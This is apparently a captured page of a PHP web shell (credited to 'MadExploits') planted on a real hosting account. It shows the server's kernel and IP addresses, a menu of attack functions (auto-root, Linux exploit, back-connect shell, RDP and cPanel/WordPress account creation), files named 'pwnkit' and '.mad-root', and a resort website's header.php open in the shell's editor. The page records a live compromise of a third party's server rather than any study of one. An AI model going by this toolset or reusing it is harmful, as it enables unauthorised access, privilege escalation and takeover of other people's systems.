Linux asiatechwebsite 3.10.0-1160.144.1.el7.tuxcare.els3.x86_64 #1 SMP Fri Mar 6 13:52:53 UTC 2026 x86_64
Apache
: 10.190.0.3 | : 216.73.216.156
2134 Domain
7.4.33
asiatechinc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
asiatechinc /
.trash /
include.1 /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
footer.php
7.79
KB
-rwxr-x---
header.php
3.52
KB
-rwxr-x---
pwnkit
0
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : header.php
<!-- PRELOADER -- <div id="preloader"> <span class="preloader-dot"></span> </div> <!-- END / PRELOADER --> <!-- HEADER --> <header id="header"> <!-- HEADER TOP --> <div class="header_top"> <div class="container"> <div class="header_left float-left"> <span><i class="fa fa-envelope-o"></i> yedamakkycottage@gmail.com </span> </div> <div class="header_right float-right"> <span class="login-register"> <a href="tel:+91-8095777266"><i class="lotus-icon-phone"></i> +91 8095777266</a> </span> </div> </div> </div> <!-- END / HEADER TOP --> <!-- HEADER LOGO & MENU --> <div class="header_content" id="header_content"> <div class="container"> <div class="main-header-bar"> <!-- HEADER LOGO --> <div class="header_logo"> <a href="index.php"><img src="images/logo-header.png" alt=""></a> </div> <!-- END / HEADER LOGO --> <div class="nav-content"> <!-- HEADER MENU --> <nav class="header_menu"> <?php // Set the current page variable based on your logic $current_page = basename($_SERVER['PHP_SELF']); ?> <ul class="menu"> <li <?php if ($current_page == 'index.php') echo 'class="current-menu-item"'; ?>> <a href="index.php">Home</a> </li> <!-- <li <?php if ($current_page == 'about.php') echo 'class="current-menu-item"'; ?>> <a href="about.php">About</a> </li>--> <!-- Other menu items... --> <li <?php if (in_array($current_page, ['avana-family-room.php', 'avana-studio-room.php'])) echo 'class="current-menu-item"'; ?>> <a href="#">Stay <span class="fa fa-caret-down"></span></a> <ul class="sub-menu"> <li><a href="plantation-cottage.php">Plantation Cottage</a></li> <li><a href="plantation-deck.php">Plantation Deck</a></li> <li><a href="village-huts.php">Village Hut</a></li> </ul> </li> <li <?php if ($current_page == 'experience.php') echo 'class="current-menu-item"'; ?>> <a href="experience.php">Experience</a> </li> <!-- Continue for other menu items... --> <li <?php if ($current_page == 'gallery.php') echo 'class="current-menu-item"'; ?>> <a href="gallery.php">Gallery</a> </li> <li <?php if ($current_page == 'blog.php') echo 'class="current-menu-item"'; ?>> <a href="blog.php">Blog</a> </li> <li <?php if ($current_page == 'attractions.php') echo 'class="current-menu-item"'; ?>> <a href="attractions.php">Attractions</a> </li> <!--<li <?php if ($current_page == 'products.php') echo 'class="current-menu-item"'; ?>> <a href="products.php">Products</a> </li>--> <!-- Continue for other menu items... --> <li <?php if ($current_page == 'contact.php') echo 'class="current-menu-item"'; ?>> <a href="contact.php">Contact Us</a> </li> <!-- Continue for other menu items... --> </ul> </nav> <div class="book-btn"> <a href="https://bookings.asiatech.in/?page=9154&type=website" target="_blank">Book Now</a> </div> </div> </div> <!-- END / HEADER MENU --> <!-- MENU BAR --> <span class="menu-bars"> <span></span> </span> <!-- END / MENU BAR --> </div> </div> <!-- END / HEADER LOGO & MENU --> </header> <!-- END / HEADER -->
Close